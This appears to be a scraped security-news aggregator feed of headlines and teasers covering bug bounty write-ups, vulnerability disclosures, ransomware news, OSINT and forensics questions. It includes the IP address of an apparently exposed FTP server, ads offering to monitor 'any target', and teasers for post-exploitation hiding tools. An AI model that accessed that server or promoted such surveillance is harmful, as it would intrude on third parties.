    Lots of (A-Do-Be) zip / exe Southeast Uni
    submitted by /u/ra6907 [link] [comments]
    Prison Complaints/Reports
    submitted by /u/bluejazzberries [link] [comments]
    Open ftp 142.116.175.23
    Wallpapers, videos submitted by /u/cheesyvagina6 [link] [comments]

    Account Takeover (Insecure Design+ Response manipulation)
    Hey Everyone! Let's learn something new, as it is going to be fun learning today. Continue reading on Medium »
    SSRF — Server Side Request Forgery
    Simple Brief Explanation of SSRF Continue reading on Medium »
    ‘PTN’ infosec monthly #9 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    All About SSRF (“Server-Side Request Forgery”)
    Are you curious how to find SSRF vulnerabilities yourself? If so, let's take a look at what SSRF really is and go over many details of SSRF… Continue reading on Medium »
    How I hacked all 265,000 Zendesk sites with one line
    Hi Everyone! Continue reading on Medium »
    Your First Day As A Bug Bounty Hunter On Immunefi
    Who We Are Continue reading on Immunefi »
    Mastering Reconnaissance in Bug Hunting
    TL;DR- Bug hunting is a challenging task, but it can be simplified with the right tools and tactics. Continue reading on The Gray Area »
    How I bypassed the registration validation and logged-in with the company email
    Hello everyone, I hope all is okay with you. Continue reading on Medium »
    Deep dive into Built-in Webserver overwrite of $_SERVER[‘request_uri’]
    While reviewing the recent PHP Development Server <= 7.4.21 Remote Source Disclosure Vulnerability on… Continue reading on Bugrid »
    Access control vulnerabilities and privilege escalation (Lab: Method-based access control can be…
    Hello everyone, I'm Ahmed, a new learner of bug bounty known as THE ATC TH3_4TC. I'm so happy to share with you my first write-up of PortSwigger… Continue reading on Medium »

    Magnet Axiom: Bringing in a new hash set post processing - possible?
    Braintrust, I am still waiting on a response from tech support, but is it possible to bring a new hash set into Axiom after processing? I don't see anything in the manual regarding this and I haven't yet played with their new remote Hash Manager (boxes are offline). Thanks. submitted by /u/Sir_Agent_Apple [link] [comments]

    Unlocking the Power of OSINT
    Unlock the power of open-source intelligence to uncover hidden truths and gain valuable insights. Continue reading on Medium »
    The Art of Tracking a Hacker || Data Breaches
    In the world of cybersecurity, it’s pretty common when companies or individuals get affected because of cyber attacks or Data Breaches. Continue reading on System Weakness »
    Do You Find Someone OR Something?
    I will be your OSINT investigator, monitoring any target of yours. Continue reading on Medium »

    The Importance of Red Team and Blue Team in an Enterprise
    Red teams and Blue teams are essential security components for enterprises. Read about the red team’s and blue team's skills and… Continue reading on Medium »
    Red Team Operations in Cyber Security
    Using an adversarial approach, red teaming is a technique for rigorously assessing plans, rules, systems, and premises. A red team may be… Continue reading on Medium »

    Truffle Security is proud to host a new XSSHunter, that finds new vulnerabilities
    submitted by /u/wifihack [link] [comments]
    DDoS attacks in Europe experienced a 73% increase in 2022 compared to the previous year
    submitted by /u/shapelez [link] [comments]
    Metasploit Framework 6.3 Released
    submitted by /u/Fugitif [link] [comments]
    FIM (File Integrity Monitor) proof-of-concept implementation
    submitted by /u/CsaProtocol [link] [comments]
    Public Disclosure for CVE-2022-42475
    submitted by /u/BlackCatNeo [link] [comments]

    SecWiki News 2023-01-30 Review
    Nacos accessToken authentication bypass vulnerability and some thoughts, by 君行路; SecWiki Weekly (Issue 465), by ourren; Small tips for thesis writing, by ourren; Code execution vulnerability via the php://filter filter, by ourren. For more of the latest articles, visit SecWiki

    XSS in uploader
    Hello ;) Continue reading on Medium »
    How I am able to find XSS on Boat Chat Bot
    Hi there! My name is Malav Khatri, and I’m a Security Researcher. I’m going to share how I am able to get XSS in the chatbot on the… Continue reading on Medium »

    FreeBuf Morning Report | Ukraine classifies Russian cyberattacks as war crimes; Zendesk employee hacked, leaking users' personal information
    Ukrainian officials are making history and may even reshape the future of cyber warfare.
    Scope and practical implementation of an enterprise (client-side) defense-in-depth system
    The defense-in-depth model is often discussed and analyzed by both enterprises and vendors; it is the most important reference model in enterprise security construction and is of very high value in real-world attack-defense confrontations.
    Raked in US$100 million, infiltrated by the FBI for six months: 2022's most profitable group is finished
    The US Department of Justice and Europol jointly announced that, after a six-month infiltration, the notorious Hive ransomware group was taken down by the FBI and international police.
    FB Book Giveaway No. 94 | Which books to read to get ahead in the cybersecurity industry in 2023: they are all here
    The article lists the 10 most popular cybersecurity books of 2022; readers are invited to name the one they most want in the comments and give their reasons.
    Over 20 million downloads: uninstall these phishing apps now
    A new activity-tracking application has had huge success on Google Play, Android's official app store, with more than 20 million downloads.
    Due to frequent vulnerabilities, Microsoft urges customers to protect on-premises Exchange servers
    In recent years, Exchange Server has proven to be a very lucrative attack vector, and many of its security vulnerabilities have been used in zero-day attacks.
    Microsoft 365 down globally for 5 hours, and a router was to blame
    The five-hour global Microsoft 365 outage was caused by a router IP address change that led to packet-forwarding problems between all the other routers in its WAN.

    Analysis of a Firefox 0day in the wild
    Author: 维一零. Original link: https://weiyiling.cn/one/firefox_0day_case_analysis RCE part: In the renderer process, a JS script exploits a UAF vulnerability in XSL object parsing to execute remote shellcode. Vulnerability principle: The exploit first defines some XML containing multiple XSL objects. It then calls the transformToDocument method, which causes the Convert function to be invoked. The Convert function...
    Automated vulnerability discovery in practice based on code property graphs
    Author: wh1t3Pig. Original link: 《基于代码属性图的自动化漏洞挖掘实践》 0 Preface: Using program analysis techniques to discover application vulnerabilities has long been a research focus in both academia and industry. From the earliest regex matching to the recent code property graph approaches, many security tools and commercial products from different eras, at home and abroad, have been developed to find security problems in program code. For Java, the industry already has a number of excellent products, such as CodeQL, but most of them approach the problem from an enterprise or open-source perspective...

    Malware development part 6 - advanced obfuscation with LLVM and template metaprogramming
    submitted by /u/dmchell [link] [comments]

    Geolocating Terrorists With ChatGPT
    TOPICS Continue reading on The Sleuth Sheet »
    15 resources for discovering OSINT
    Digital investigation and its many methods are talked about more and more. Here are a few resources for discovering this discipline. Continue reading on Medium »
    Mistakes of administrators of Telegram channels
    If you only knew how many mistakes the administrators of political Telegram channels make… One of the most popular mistakes is leaving the… Continue reading on Medium »
    ChatGPT: AI is coming…
    Neural network technologies included in ChatGPT (https://openai.com/blog/chatgpt/) are beginning to be used everywhere. The simplest and… Continue reading on Medium »
    SPY NEWS: 2023 — Week 4
    Summary of the espionage-related news stories for the Week 4 (January 22–28) of 2023. Continue reading on Medium »
    “Navigating the World of OSINT: A Beginner’s Guide”
    Open Source Intelligence (OSINT) collects, analyzes, and disseminates publicly available and legally obtained information. The goal of… Continue reading on Medium »
    Need online investigation, background someone or something? Look no further!
    As a professional online private investigator, I have the skills and expertise to gather the information based on your need, to make… Continue reading on Medium »
    Want to find someone in the online world, or do you want to check someone's background?
    As an OSINT (Open-Source Intelligence) service provider, I am excited to offer my expertise and tools to individuals and businesses… Continue reading on Medium »
    Israeli Operations Internal to Iran
    Same tactics, different enemy, another day…. Continue reading on Medium »
    Infoga E-Mail Information Gathering Tool
    A tool that is very simple to use and can be useful in the information-gathering phase of a penetration test. It gathers information from Google, Shodan… Continue reading on Medium »

    How To Become A Hacker In 2023 | From Zero to Hero
    In this video, we will explore the skills and knowledge needed to become a hacker. From understanding different types of hackers and their… Continue reading on Medium »
    How I was able to find 4 Cross-Site Scripting (XSS) bugs on a vulnerability disclosure program
    Hello I’m Amr Mustafa AKA DrakenKun Continue reading on Medium »
    A not so common bug but easy to look for
    Hello everyone, today I'm going to talk about a bug I have found only once and other hackers told me it's kinda rare, but it's so simple… Continue reading on Medium »
    Blind XSS To SSRF
    During bug hunting in a private bug bounty program, I came across a feature within the application that allowed for the generation of PDF… Continue reading on Medium »
    SQL Injection Vulnerability -Web Application Penetration Testing
    What is SQL Injection Continue reading on Medium »
    Discovered a Critical IDOR and Earned $900 for My First P1 Vulnerability!
    Hello Guys, It has been a very long time since I wrote a bug bounty write-up. Without any delay, let's get into it. Continue reading on Medium »
    Open Redirect Bug Bounty
    What is an open Redirect? Continue reading on Medium »
    Directory Traversal -Web Application Penetration Testing
    What Is Directory Traversal? Continue reading on Medium »
    All About Attacking JWT
    JWT: The Weak Link in Your Security Chain? Understanding and Addressing JWT-related Threats Continue reading on InfoSec Write-ups »

    Hackers Using Microsoft OneNote Attachments To Spread Malware
    submitted by /u/achilles4828 [link] [comments]
    /r/netsec's Q1 2023 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    PHP Development Server <= 7.4.21 - Remote Source Disclosure
    submitted by /u/Gallus [link] [comments]

    Ftkimager CLI logical image without unallocated space
    Is there a way to generate a logical image of a drive with ftkimager command line interface without the unallocated space? I’m currently testing with generating E01s by using the drive’s logical path as a source, but by default, it includes the unallocated space, and it doesn’t accept folder paths, or doesn’t seem to have any attributes to exclude unallocated space. So it seems like I’m just creating a physical E01 image of a partition. Am I missing something or is it just not possible? submitted by /u/RESP-svee-T [link] [comments]
    Looking to get started
    Hello everyone, I recently graduated from college and I am looking to get started in my career within computer forensics. I have done some research, such as taking certs. Are there other ways I can start, since money is sorta tight at the moment? Any and all advice would be helpful. submitted by /u/Plane-Quantity-651 [link] [comments]
    SANS FOR500 roadmap (seeking advice)
    Hello everyone, I have a little experience in cyber security (6 months of working in a SOC). I am making a plan on how to prepare myself for the FOR500 exam. I have almost finished Practical Windows Forensics by TCM-Security, which is awesome, and watched the 13Cubed YouTube channel. I am just asking for any free or inexpensive courses to build a strong foundation. submitted by /u/stas-citrus [link] [comments]

    Open Redirect at blueonboardingqa1.jetblue.com
    JetBlue disclosed a bug submitted by mmdz: https://hackerone.com/reports/1457736
    Rails ActionView sanitize helper bypass leading to XSS using SVG tag.
    Internet Bug Bounty disclosed a bug submitted by haqpl: https://hackerone.com/reports/1805873 - Bounty: $2400

    SecWiki News 2023-01-29 Review
    No news updates today~ For more of the latest articles, visit SecWiki

    Unauthenticated RCE in Centos Control Web Panel 7 (CWP) – CVE-2022-44877
    Article URL: https://www.vicarius.io/vsociety/blog/unauthenticated-rce-in-centos-web-panel-7-cwp-cve-2022-44877 Comments URL: https://news.ycombinator.com/item?id=34567059 Points: 1 # Comments: 1

    FreeBuf Morning Report | Hacker revenue falls as victims refuse to pay ransoms; Russian Foreign Ministry: the US is invading cyberspace
    The RT website reported that Ukrainian President Zelensky unexpectedly appeared on a Russian TV channel on the 25th.
    World Economic Forum: Global Cybersecurity Outlook 2023
    The World Economic Forum, together with Accenture, released the "Global Cybersecurity Outlook 2023" report, forecasting the cybersecurity trends that will affect the global economy and society over the coming year.
    Russian IT giant's source code leaked in full; company denies hacker intrusion
    The source code repository of Yandex, one of Russia's largest IT companies, was reportedly stolen by a former employee

    Cheat Sheet for Ffuf
    Here is a quick cheat sheet for Web application pen testing with FFuF: Continue reading on Medium »

    JS Enumeration Tools for Bug Bounty Hunting: Identifying Vulnerabilities and Gaining Website…
    JS Enumeration is a crucial step in the process of identifying and exploiting vulnerabilities in a website. As a bug bounty hunter, you… Continue reading on Medium »
    Bypass CSRF protection with XSS.
    Do not send an xss report before reading this Continue reading on Medium »
    CRLF-Carriage Return and Line Feed in Short | 2023
    Carriage Return and Line Feed In Short Bug Bounty | karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    The easiest way to get subdomain takeover
    In the name of God, the Most Gracious, the Most Merciful. Continue reading on Medium »
    Disclosing Facebook page admins by playing a game
    Hello there, It’s been a long time since I wrote any article on my resolved reports due to some internal problems so today I’m going to… Continue reading on Medium »
    Securing your Infrastructure using Crowdsourced Security
    Bug Bounty hunting is a crowdsourced cyber security model that helps companies utilize the power of the crowd to secure their… Continue reading on Shahmeer Amir »
    Hide Evidence in a Hacked System
    Introduction Continue reading on Medium »
    Bug Bounty Hunting — 403 Forbidden Bypass
    Hello friends, in this article, what kinds of techniques can we apply to get past a 403 restriction? And using the 403bypass tool, quickly… Continue reading on Medium »
    XSS, Flash Cross-Domain Policy, and CSRF Vulnerabilities Discovered on a Single Website
    Hello everyone, my name is Koroush (aka whiteOwl). In this write-up, I will be discussing the methods I used to bypass the site's input… Continue reading on Medium »
    bWAPP Mail Header Injection
    What is Mail Header Injection? Continue reading on Medium »

    TryHackMe Red Team Fundamentals Writeup
    Task 1 Introduction Continue reading on Medium »

    OSINT tool free to use
    OSINT tools for Cyber security Continue reading on Medium »
    What is OSINT and how do cyber security specialists perform OSINT on a person?
    OSINT, or Open-Source Intelligence, is the process of collecting, analyzing, and disseminating information from publicly available sources… Continue reading on Medium »
    OSINT Quiz Walkthrough — 23/01/2023
    Walkthrough about an OSINT Quiz challenge. Continue reading on Medium »
    Where does threat data come from?
    Understanding all the sources of threat data becomes intuitive if we can visualize cyberspace. Continue reading on Pagesweturned — Curie »
    Where does threat data come from?
    Understanding all the sources of threat data becomes intuitive if we can visualize cyberspace. Continue reading on Medium »

    SecWiki News 2023-01-28 Review
    Building a coherent system: another key part of a thesis, by ourren. For more of the latest articles, visit SecWiki

    The fun Hack-A-Sat satellite hacking challenge: dumping satellite platform memory
    Since 2020, the US has held the space-security competition "Hack-A-Sat" for two consecutive years; this article introduces the Hack-A-Sat challenge of dumping the satellite platform's memory via the maintenance interface.
    Java code audit project: the indedu (因酷) open-source online education system
    Java code audit project: the indedu (因酷) open-source online education system, an open-source framework built on the SSM architecture
    FreeBuf Morning Report | Russian tech giant Yandex's internal source code leaked; new "pig butchering" scam in West Africa
    The source code repository of Yandex, one of Russia's largest IT companies, was reportedly stolen by a former employee, and the data has been leaked as a BitTorrent seed on a popular hacker forum.
    Analysis of Java stack overflow vulnerabilities
    Java data types are stored during execution in two different kinds of memory, the stack and the heap, maintained by the underlying platform that runs the Java Virtual Machine (JVM).
    A beginner's summary of learning PHP deserialization
    I recently worked through some deserialization challenges; my knowledge is limited, but I hope this helps CTF beginners, and I welcome corrections from the masters. First we need to understand what serialization is: serialization is the process of converting a variable or object into a string, used for storing or transmitting PHP values
    Ukrainian news agency attacked by Russian military hacking group
    Ukraine's computer emergency response team found a combination of five different data-wiping malware families on the network of the country's national news agency
    Salamandra: a powerful microphone-bug detection tool
    Salamandra is a powerful microphone-bug detection tool that helps researchers detect and locate spy microphones in enclosed environments.
    How to use Vegile to hide the execution of a specified process
    Vegile is a powerful post-exploitation tool designed and developed for Linux systems, allowing deeper penetration testing and security analysis of a target's trusted network.
  • Open

    Is Bitwarden + YubiKey 100% secure?
    Hello, it is time for me to get a serious password manager... at the moment I'm using Google, but I feel I'm "playing with fire" lol. After the LastPass saga, I now have doubts about the whole concept.... I was thinking that Bitwarden + YubiKey seems to be the most secure option out there.... In theory, even if my master password gets compromised, without my physical YubiKey nobody can access it... correct? Or would the LastPass issue anyhow put my password at risk also with a YubiKey? Mmmm, I am a bit confused... submitted by /u/IP_FiNaR [link] [comments]

  • Open

    Analyzing javascript files(Part -2)
    Before reading the second part, go and read part 1 https://medium.com/@indhumathi19973/analyzing-javascript-files-part-1-9b07eb8cfb8e Continue reading on Medium »
    Automate your Bug Bounty with ChatGPT | 2023
    Use ChatGPT to Find Vulnerabilities and to Learn about Vulnerabilities | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 21–27 January]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Sensitive Data Exposure: Take Over All Environment
    Hello everyone, this time I want to tell the story of how I found a vulnerability on a website, one of a restaurant's websites… Continue reading on Medium »
    Discovered a Reflected Cross-Site Scripting Vulnerability in Shaadi.com
    I have discovered a Reflected XSS vulnerability in shaadi.com, which means that an attacker can inject malicious code into the website, which… Continue reading on Medium »
    Is Bug Bounty Worth The Hype?
    This article discusses the pros and cons of bug bounty programs and how they can be useful for organizations. Continue reading on Medium »
    Why Every Bug Hunter Should Perfect Their Vulnerability Reports
    TL;DR- Today, we’ll take a look at some steps and examples of phenomenal bug hunting write-ups that are used to get even higher bounties. Continue reading on The Gray Area »
  • Open

    RESTler is a stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=34552574 Points: 6 # Comments: 0
    Findings from HashiCorp's Vault API fuzzing (1)
    Article URL: https://ludovicianul.github.io/2023/01/26/vault-api-fuzz-part1/ Comments URL: https://news.ycombinator.com/item?id=34545710 Points: 3 # Comments: 0
    Critical RCE Vulnerabilities Found in Git – Fuzzing Weekly CW4
    Article URL: https://ioc.exchange/@FuzzingWeekly/109760561292096797 Comments URL: https://news.ycombinator.com/item?id=34544360 Points: 1 # Comments: 0
  • Open

    How do FIDO U2F security keys work?
    I'm trying to understand how these physical keys work. So far I found: https://www.fastmail.com/blog/how-u2f-security-keys-work/ If I simply open up a text editor, plug in the key and press the button I get a random 6 digit number, is that the nonce? I assume the same process happens if I use USB or NFC? How are those random numbers generated? True randomness is hard. Is the secret key unique to every device a manufacturer creates? If I buy a key from a shady guy on the corner and he just cloned every key to save money, so that every key has the same secret key and generates the same random numbers, then any key can access any account? Is that a realistic scenario with so many devices made by the lowest bidder in China? Alternatively, the random number generator and the private key generator the factory uses can be flawed, in which case the auth can be brute forced? Thanks. submitted by /u/lmow [link] [comments]
    Could Bitwarden have the same issue as LastPass?
    As the LastPass saga is cooling off, I wonder if other password managers (e.g. Bitwarden) could have the same issue... or maybe the master password is only stored on each one's machine/phone.. Ideas? Thank you submitted by /u/IP_FiNaR [link] [comments]
    Do you need to back up these things?
    IT student here, but just curious: are you supposed to back up your domain controller? For your Active Directory? It seems like that would be a smart thing to do. Also, when it comes to SaaS applications, do most organizations just rely on the vendor for data backups, or do most organizations have their own method to back up a cloud/SaaS application's data? submitted by /u/SmarterTogether [link] [comments]
    Understanding SSH with public keys
    I'm learning about ssh-keygen and how to generate public keys. Daily, when I connect to a remote IP I use ssh. Just in the case of GitHub or GitLab I followed the steps to generate a pair of keys and send the public one to the remote server. I didn't stop to understand how it works, or even whether this is the more secure way to connect. So, making a pair of keys in RSA or ed25519, copying it to the IP and using the passphrase: is it more secure than regular credentials? What are the cons of logging in this way? Someone getting the key somehow? Getting my passphrase? An explanation would be very welcome :) submitted by /u/MrNoodlesLearns [link] [comments]
    BitLocker - two questions
    I have 1 hard drive with 2 partitions; will BitLocker encrypt both? Do I encrypt only used space or all of it? If only used space, what happens to the unused space, does it get encrypted as data is written to it? submitted by /u/foxtrot90210 [link] [comments]
  • Open

    Updates, Compilation
    Thoughts on Detection Engineering. I read something online recently that suggested that the role of detection engineering is to reduce the false positive (FP) alerts sent to the SOC. In part, I fully agree with this; however, "cyber security" is a team sport, and it's really incumbent upon SOC and DFIR analysts to support the detection engineering effort through their investigations. This is something I addressed a bit ago in this blog, first here, and then here. From the second blog post linked above, the most important value-add is the image to the right. This is something I put together to illustrate what, IMHO, should be the interaction between the SOC, DFIR, threat hunting, threat intel, and detection engineering. As you see from the image, the idea is that the output of DFIR work,…
  • Open

    [U.S. Air Force] Information disclosure due to unauthenticated access to APIs and system browser functions
    U.S. Dept Of Defense disclosed a bug submitted by theinternetofdefcon_: https://hackerone.com/reports/1822160
    Reflected XSS on .mil
    U.S. Dept Of Defense disclosed a bug submitted by alishah: https://hackerone.com/reports/1799562
    reflected xss in www..gov
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1814335
    XSS on ( .gov ) Via URL path
    U.S. Dept Of Defense disclosed a bug submitted by notajax: https://hackerone.com/reports/1825942
    IDOR for changing privacy settings on any memories
    TikTok disclosed a bug submitted by mrhavit: https://hackerone.com/reports/1733627 - Bounty: $5500
    XSS at TikTok Ads Endpoint
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1683129 - Bounty: $5000
    Verification process done using different documents without corresponding to user information / User information can be changed after verification
    EXNESS disclosed a bug submitted by siddharthamx: https://hackerone.com/reports/1446107 - Bounty: $500
    wavecell.com: Broken Link Hijacking / Instagram Takeover @
    8x8 disclosed a bug submitted by xdopa: https://hackerone.com/reports/1826892
    Any user can vote on `Friend Only` video pull
    TikTok disclosed a bug submitted by mrhavit: https://hackerone.com/reports/1793940 - Bounty: $500
  • Open

    This paper reinforces the belief that RSA isn't going to fall to Shor's Algorithm anytime soon
    submitted by /u/atoponce [link] [comments]
    Justice Dept. Dismantles a Major Ransomware Operation
    submitted by /u/dlorenc [link] [comments]
    Factorization (DCQF) of a 48-bit integer using 10 trapped-ion qubits
    submitted by /u/c0r0n3r [link] [comments]
    Kamailio's exec module considered harmful – RTC security
    submitted by /u/EnableSecurity [link] [comments]
    Pre-Auth RCE on OpenEMR: Using a rogue MySQL server to steal your health data
    submitted by /u/SonarPaul [link] [comments]
    Fun with Gentoo: Why don't we just shuffle those ROP gadgets away?
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2023-01-27 Review
    No news updated yet today. For more of the latest articles, visit SecWiki
  • Open

    Derek and Clive, Monty Python, National Lampoon, The Comic Strip, Some Music, SFX... I think this is an index of Vinyl Records converted to MP3
    Main index is here https://www.footnoteconspiracy.com/ The comedy (radio?) shows and mp3 conversions, are in /datadump/ so that's a good place to start. submitted by /u/little_maggot [link] [comments]
  • Open

    Burp Suite roadmap update: January 2023
    Believe it or not, it's January once again. And this can mean only one thing - it's time to update you on the changes we've got in store for Burp Suite over the next six months.     But this
    Packetlabs Ltd delivers advanced testing capabilities with Burp Suite Certified Practitioners
    We launched the Burp Suite Certified Practitioner (BSCP) certification at the end of 2021 due to growing demand from Burp Suite Professional customers. Spanning everything from classic vulnerability c
  • Open

    DeepHunter Fuzzes Deep Neural Networks (DNN)
    Researchers built a coverage-guided fuzzer, DeepHunter, for protecting DNNs against malicious attacks. Continue reading on Medium »
    Critical RCE Vulnerabilities Found in git — Fuzzing Weekly CW4
    Critical RCE Vulnerabilities Found in git (CVE-2022-4190, CVE-2022-23251)… Continue reading on Medium »
  • Open

    Mitigating RBAC-Based Privilege Escalation in Popular Kubernetes Platforms
    We recap our research on privilege escalation and powerful permissions in Kubernetes and analyze the ways various platforms have addressed it. The post Mitigating RBAC-Based Privilege Escalation in Popular Kubernetes Platforms appeared first on Unit 42.
  • Open

    Forensics tools - Apple Mx Pro
    Hello everyone. I'm looking to buy a MacBook Pro with M1/M2 Pro architecture and was wondering if any of you have any experience running x86 executables within a Windows ARM VM. I first assumed it was impossible to run x86s (since Rosetta only works within Linux ARM VMs), but I've subsequently heard that it is now doable. Have any of you had the chance to try? If so, how is your performance? submitted by /u/samaritan_o [link] [comments]
    Need link to Magnet Acquire direct download.
    I've submitted the form on their website through my work. I've even spoken with a sales person, but I'm on day 3 now without a download link. submitted by /u/Scrant0nStr4ngler [link] [comments]
  • Open

    Analyze CVE Exposures – Threat Detection in Cybersecurity with Memgraph
    Article URL: https://memgraph.com/blog/efficient-threat-detection-in-cybersecurity-with-memgraph Comments URL: https://news.ycombinator.com/item?id=34544326 Points: 2 # Comments: 0
    CVE-2023-23504: XNU Heap Underwrite in dlil.c
    Article URL: https://adamdoupe.com/blog/2023/01/23/cve-2023-23504-xnu-heap-underwrite-in-dlil-dot-c/ Comments URL: https://news.ycombinator.com/item?id=34542007 Points: 1 # Comments: 0
  • Open

    Gaza Surveillance
    An analysis of a Ministry of Defense video shows Egypt monitoring the border strip with Gaza using more than 120 surveillance cameras deployed from the sea to the Kerem Shalom crossing. Continue reading on Medium »
    Telegram OSINT
    This is just an introduction; follow for the upcoming series on hacking. Continue reading on Medium »
  • Open

    U.S. Department of Justice Disrupts Hive Ransomware Variant
    submitted by /u/dmchell [link] [comments]
    DragonSpark | Attacks Evade Detection with SparkRAT and Golang Source Code Interpretation
    submitted by /u/dmchell [link] [comments]
  • Open

    Easy XSSHunter Discord Alerts
    This will be a setup guide for XSSHunter and integrating it with Discord Continue reading on InfoSec Write-ups »
    MX Takeovers Automated | Subdomain Takeover
    MX-Takeover is a Go tool that automatically takes over e-mail subdomain services when they become available. Continue reading on InfoSec Write-ups »
    Biggest Cybersecurity Threats in 2023
    Stay informed and protect yourself and your organization against Ransomware, Phishing, Advanced persistent threats, IoT threats, Cloud… Continue reading on InfoSec Write-ups »
    Data Science meets Cyber Security
    No content preview
    You got Domain Admin, now what?
    No content preview
    3 practical steps to learn AWS security in 2023
    Follow these steps to get from a beginner to a pro in AWS security Continue reading on InfoSec Write-ups »
    Easy XSSHunter Express Setup Script
    With xsshunter.com shutting down, setting up your own XSSHunter will be more important. This script will make it a lot easier. Continue reading on InfoSec Write-ups »
  • Open

    LoL source code stolen, auctioned on the dark web for 1 million
    Riot Games has admitted it was hit by a hacker attack; the source code of League of Legends, Teamfight Tactics and its anti-cheat platform was stolen.

  • Open

    Palantir's eye over Ukraine
    The big-data intelligence giant has officially announced its support for the Ukrainian army. Detailed analysis of the territory and capture… Continue reading on Medium »
    Unleash the Power of AMASS: Discover Hidden Subdomains and Assets with this Must-Have Security Tool
    How to Use the Security Tool AMASS Continue reading on Medium »
    Unleash the Power of AMASS: Discover Hidden Subdomains and Assets with this Must-Have Security Tool…
    AMASS (Attack Surface Mapping and Asset Discovery) is a security tool that can be used to discover subdomains and assets associated with a… Continue reading on Medium »
  • Open

    Finding Truth in the Shadows
    submitted by /u/dmchell [link] [comments]
    Vice Society Ransomware Group Targets M
    submitted by /u/dmchell [link] [comments]
  • Open

    Security Onion issue with Kibana "application not found"
    I have searched for an answer and looked at the SO docs and can't find the answer to this problem. Getting logs into SO works just fine and I can see the "all logs" count going up. The issue is that when I click on any data that has a blue hyperlink, instead of Kibana drilling down I get a new browser window with a message saying "application not found". Can anybody point me to documentation on how I fix this? submitted by /u/Sho_nuff_ [link] [comments]
    tlsv1 decrypt error with mitmproxy
    Hello, I'm trying to see what data apps send and receive from their servers using mitmproxy. For a long time I had no problems decrypting HTTPS with the certificate installed, but since December I get "Client TLS handshake failed" errors, both when I route curl through the proxy on my host machine and when I route Android through the proxy. It happens whether I use mitmproxy from my package manager, the Linux binary from mitmproxy's website, a build from git, or the Docker image, and both with my own user and with a different user account. However, when using mitmproxy on a virtual machine with the same operating system (Arch Linux), I get no errors. It only happens in HTTP proxy mode, not in SOCKS5 mode. On mitmproxy's bug tracker I got redirected to the discussions section and was ignored.

    Command with which I start mitmproxy: mitmdump --verbose

    curl command: curl -x http://127.0.0.1:8080 https://google.com

    mitmproxy output:
    ```
    [19:47:26.419] HTTP(S) proxy listening at *:8080.
    [19:47:27.456][127.0.0.1:42784] client connect
    [19:47:27.476][127.0.0.1:42784] server connect google.com:443 (142.250.203.142:443)
    [19:47:27.588][127.0.0.1:42784] Client TLS handshake failed. The client may not trust the proxy's certificate for google.com (OpenSSL Error([('SSL routines', '', 'tlsv1 alert decrypt error')]))
    [19:47:27.589][127.0.0.1:42784] client disconnect
    [19:47:27.589][127.0.0.1:42784] closing transports...
    [19:47:27.589][127.0.0.1:42784] server disconnect google.com:443 (142.250.203.142:443)
    [19:47:27.590][127.0.0.1:42784] transports closed!
    ```

    curl output: curl: (35) OpenSSL/3.0.7: error:0200008A:rsa routines::invalid padding

    mitmproxy --version output:
    ```
    Mitmproxy: 9.0.1
    Python: 3.10.9
    OpenSSL: OpenSSL 3.0.7 1 Nov 2022
    Platform: Linux-6.1.8-arch1-1-x86_64-with-glibc2.36
    ```
    submitted by /u/greenhaveproblemexe [link] [comments]
    UTMStack VS Wazuh VS Security Onion
    Hi there, I am currently studying these products. Has anyone worked with them? What are the main differences (apart from the GUI)? As far as I can see they are all based on the ELK stack. I had never heard of UTMStack and have little information about it. submitted by /u/athanielx [link] [comments]
    Learn Cybersecurity along with webDev
    I'm currently learning web development and was interested in exploring the networking and security aspect of it too. Was wondering if I could do so and if yes, which resources would you recommend? submitted by /u/god_of_hypocrites17 [link] [comments]
    My ASUS Falchion keyboard has two keyboards and a mouse in it - malicious?
    I've been experiencing a fair bit of cyber attacks, and I am wondering if my ASUS ROG Falchion keyboard might have been spiked a bit - when I plug it in on Windows I see 2 new keyboards and 1 new mouse show up. Before plugging in: https://imgur.com/a/1lyRZpP After plugging in: https://imgur.com/a/lapQSpy On Linux, using "tail -f /var/log/kern.log /var/log/syslog" I get this output: ==> /var/log/syslog /var/log/kern.log /var/log/syslog <== Jan 26 02:25:11 pop-os kernel: [16688.704200] usb 3-1: New USB device found, idVendor=0b05, idProduct=193c, bcdDevice= 3.16 J…
  • Open

    Program for viewing .vcf
    Does anyone have any suggestions for a cheap or free program to view .vcf or if it's included in an existing forensic suite and I'm just missing it? submitted by /u/dgree049 [link] [comments]
  • Open

    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    Article URL: https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi Comments URL: https://news.ycombinator.com/item?id=34536361 Points: 1 # Comments: 0
    Realtek SDK Vulnerability Attacks Highlight IoT Supply Chain Threats
    Article URL: https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=34531380 Points: 2 # Comments: 0
    Exploiting a Critical Spoofing Vulnerability in Windows CryptoAPI
    Article URL: https://www.akamai.com/blog/security-research/exploiting-critical-spoofing-vulnerability-microsoft-cryptoapi Comments URL: https://news.ycombinator.com/item?id=34529259 Points: 1 # Comments: 0
  • Open

    How I Found My First Bug in Android
    Bypass the Password and Biometrics Functionalities Continue reading on Medium »
    What is a website bug?
    A website bug is an error or malfunction that occurs on a website, which can cause it to behave in unexpected ways or prevent it from… Continue reading on Medium »
